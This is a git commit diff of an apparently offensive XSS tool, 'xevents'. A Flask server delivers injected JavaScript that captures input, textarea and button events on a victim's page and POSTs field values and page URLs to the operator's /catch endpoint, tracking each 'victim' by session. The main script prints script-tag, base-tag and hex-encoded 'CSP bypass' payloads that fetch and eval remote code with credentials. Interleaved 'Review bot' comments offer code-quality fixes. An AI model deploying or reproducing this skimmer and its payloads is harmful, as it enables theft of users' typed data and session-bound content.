Add files via upload
parent
1054bb8423
commit
c2315c6a9a
|
@ -0,0 +1,12 @@
|
||||||
|
import argparse
|
||||||
|
def parser():
|
||||||
|
parser = argparse.ArgumentParser(description="xevents args")
|
||||||
|
parser.add_argument("-H","--host",default="0.0.0.0",help="ip, default 0.0.0.0")
|
||||||
|
parser.add_argument("-p","--port",default=5000,help="port, default 5000")
|
||||||
|
parser.add_argument("-t","--tags",nargs="+",help="tag list separated by spaces")
|
||||||
|
parser.add_argument("-a","--actions",nargs="+",help="event list separated by spaces")
|
||||||
|
parser.add_argument("-c","--config",default="xevents.json",help="json config file (ignored if tags and events specified)")
|
||||||
|
parser.add_argument("-tu","--tunnel",help="url of tunnel")
|
||||||
|
args = parser.parse_args()
|
||||||
|
args.url = args.tunnel or f"http://{args.host}:{args.port}"
|
||||||
|
return args
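Review bot: `--port` is declared without `type=int`, so a port given on the command line is a string while the default is an integer, and a non-numeric value is presumably only rejected later, inside `app.run(args.host,args.port)`, instead of by argparse. Declare it as `parser.add_argument("-p","--port",type=int,default=5000,help="port, default 5000")`. The `--host` default of `0.0.0.0` makes the listener reachable on every interface. `127.0.0.1` is the safer default, with a wider bind chosen explicitly. The local `ArgumentParser` also reuses the function's own name `parser`, which is legal but easy to misread; `arg_parser` would do.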
|
|
@ -0,0 +1 @@
|
||||||
|
fetch('%url%/p',{credentials: 'include'}).then(response=>response.text()).then(text=>{eval(text)})
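Review bot: Nothing documents what this one-line snippet depends on, and the label the main script prints for it ("csp src self bypass") overstates what it does. It needs `eval` to be permitted and a cross-origin `fetch` with credentials to be allowed, so a policy whose `script-src` omits `'unsafe-eval'` and whose `connect-src` is limited to trusted origins stops it. That dependency, and the fact that `%url%` is substituted by the main script before printing, should be documented next to the `print` that labels it rather than inside this file, since the file is wrapped verbatim into a string.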
|
|
@ -0,0 +1,24 @@
|
||||||
|
const url = '{{url}}';
|
||||||
|
const tags = ["{{tags|join('","')}}"];
|
||||||
|
const actions = ["{{actions|join('","')}}"];
|
||||||
|
|
||||||
|
|
||||||
|
function actionLog(inp){
|
||||||
|
actions.forEach(action => {
|
||||||
|
inp.addEventListener(action,function(e){
|
||||||
|
const jsondata={"location":window.location.href,"name":inp.name,"id":inp.id,"class":inp.className,"type":inp.type,"tag":inp.tagName,"action":action,"value":inp.value}
|
||||||
|
fetch(url,{
|
||||||
|
method: 'POST',
|
||||||
|
credentials: 'include',
|
||||||
|
headers: {
|
||||||
|
'Content-Type': 'application/json'
|
||||||
|
},
|
||||||
|
body: JSON.stringify(jsondata)
|
||||||
|
});
|
||||||
|
})
|
||||||
|
})};
|
||||||
|
|
||||||
|
tags.forEach(tag => {
|
||||||
|
let inputs=Array.from(document.getElementsByTagName(tag));
|
||||||
|
inputs.forEach(actionLog);
|
||||||
|
})
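Review bot: `url`, `tags` and `actions` are interpolated into JavaScript string literals with no escaping. This appears to be the `xevents.js` template passed to `render_template`, and Flask does not enable Jinja autoescaping for `.js` templates, so a quote or backslash in a `--tags`/`--actions` value or in the config file breaks the script or changes its meaning. Serialise the values instead: `const url = {{ url|tojson }};`, `const tags = {{ tags|tojson }};` and `const actions = {{ actions|tojson }};`.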
|
|
@ -0,0 +1 @@
|
||||||
|
{"tags":["input","textarea","button"],"actions":["click","focusout","focus","copy","input"]}
|
|
@ -0,0 +1,106 @@
|
||||||
|
#imports
|
||||||
|
from flask import Flask, render_template, request, redirect, make_response, session
|
||||||
|
from flask_cors import CORS
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import secrets
|
||||||
|
from colorama import Fore, Back, Style
|
||||||
|
import lib.parse
|
||||||
|
from os import path
|
||||||
|
|
||||||
|
app = Flask(__name__)
|
||||||
|
|
||||||
|
#secret key for sessions generated at runtime
|
||||||
|
app.secret_key = secrets.token_urlsafe(16)
|
||||||
|
|
||||||
|
#configure cross origin credential support for victim tracking
|
||||||
|
CORS(app, supports_credentials=True)
|
||||||
|
|
||||||
|
#remove flasks default logging
|
||||||
|
log = logging.getLogger('werkzeug')
|
||||||
|
log.disabled = True
|
||||||
|
|
||||||
|
#simple array of xeventsIDs to keep track of victim number
|
||||||
|
sessions=[]
|
||||||
|
|
||||||
|
#handle base tag injection
|
||||||
|
@app.before_request
|
||||||
|
def prior():
|
||||||
|
if request.path.endswith(".js"):
|
||||||
|
return payload()
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
#return the payload
|
||||||
|
@app.route("/p")
|
||||||
|
def payload():
|
||||||
|
|
||||||
|
#assign victim ID
|
||||||
|
if "xeventsID" not in session:
|
||||||
|
session["xeventsID"]=secrets.token_urlsafe(16)
|
||||||
|
sessions.append(session["xeventsID"])
|
||||||
|
|
||||||
|
#read tags and actions from config
|
||||||
|
if args.tags and args.actions:
|
||||||
|
tags=args.tags
|
||||||
|
actions=args.actions
|
||||||
|
else:
|
||||||
|
with open(args.config,"r") as xeventsconfigfile:
|
||||||
|
xeventsconfig=json.loads(xeventsconfigfile.read())
|
||||||
|
tags=xeventsconfig["tags"]
|
||||||
|
actions=xeventsconfig["actions"]
|
||||||
|
|
||||||
|
#prepare and issue response
|
||||||
|
resp=make_response(render_template("xevents.js",tags=tags,actions=actions,url=f"{args.url}/catch"))
|
||||||
|
resp.headers["content-type"]="text/javascript"
|
||||||
|
return resp
|
||||||
|
|
||||||
|
#catch json post requests
|
||||||
|
@app.route("/catch",methods=["POST"])
|
||||||
|
def catch():
|
||||||
|
|
||||||
|
#set up variables from request json
|
||||||
|
rj=request.json
|
||||||
|
action=rj["action"]
|
||||||
|
tag=rj["tag"]
|
||||||
|
location=rj["location"]
|
||||||
|
del rj["action"]
|
||||||
|
del rj["tag"]
|
||||||
|
del rj["location"]
|
||||||
|
#current victim id
|
||||||
|
victim=session["xeventsID"]
|
||||||
|
|
||||||
|
#display results
|
||||||
|
print(f"{tag} tag recieved {Fore.CYAN}{action}{Style.RESET_ALL} event from {Fore.RED}victim {sessions.index(victim)}{Style.RESET_ALL} on {Fore.GREEN}{location}{Style.RESET_ALL}")
|
||||||
|
for key,value in zip(rj.keys(),rj.values()):
|
||||||
|
if value:
|
||||||
|
print(f"\t{key}:{value}")
|
||||||
|
print("\n")
|
||||||
|
return ""
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
args=lib.parse.parser()
|
||||||
|
print(f"{Fore.RED}inject as script tag: {Style.RESET_ALL}")
|
||||||
|
print(f"{args.url}/p\n")
|
||||||
|
|
||||||
|
print(f"{Fore.RED}inject as base tag: {Style.RESET_ALL}")
|
||||||
|
print(args.url)
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
with open(path.join("templates","cspbypass.js"),"r") as cspbyp:
|
||||||
|
payload=cspbyp.read().replace("%url%",args.url)
|
||||||
|
encoded="".join(["\\x%x" %ord(char) for char in payload])
|
||||||
|
encoded=f"Function(\"{encoded}\")()"
|
||||||
|
payload=f"Function(\"{payload}\")()"
|
||||||
|
|
||||||
|
|
||||||
|
print(f"{Fore.RED}csp src self bypass: {Style.RESET_ALL}")
|
||||||
|
print(payload)
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
print(f"{Fore.RED}csp src self bypass + hex encoding: {Style.RESET_ALL}")
|
||||||
|
print(encoded)
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
app.run(args.host,args.port)
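Review bot: `catch()` uses the request body and the session cookie unchecked and prints request-supplied strings straight to the console. A POST that is not JSON, lacks `action`, `tag` or `location`, or arrives without an `xeventsID` session raises and ends in a 500, and control characters in any value (terminal escape sequences, for example) reach the operator's terminal as sent. The endpoint is also open to any origin and any host that can reach it, given `CORS(app, supports_credentials=True)` and the default `0.0.0.0` bind. The rewrite below validates the body and session, answers 400 otherwise, and prints values through `repr()`.

```python
def catch():
    # accept only a JSON object sent by a client that already holds a known session
    rj = request.get_json(silent=True)
    victim = session.get("xeventsID")
    if not isinstance(rj, dict) or victim not in sessions:
        return "", 400
    action = rj.pop("action", "")
    tag = rj.pop("tag", "")
    location = rj.pop("location", "")
    # … unchanged: coloured summary print, with tag, action and location passed through repr() …
    for key, value in rj.items():
        if value:
            # repr() escapes control characters so request data cannot drive the terminal
            print(f"\t{key}:{value!r}")
    # … unchanged: trailing print and empty response …
```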
|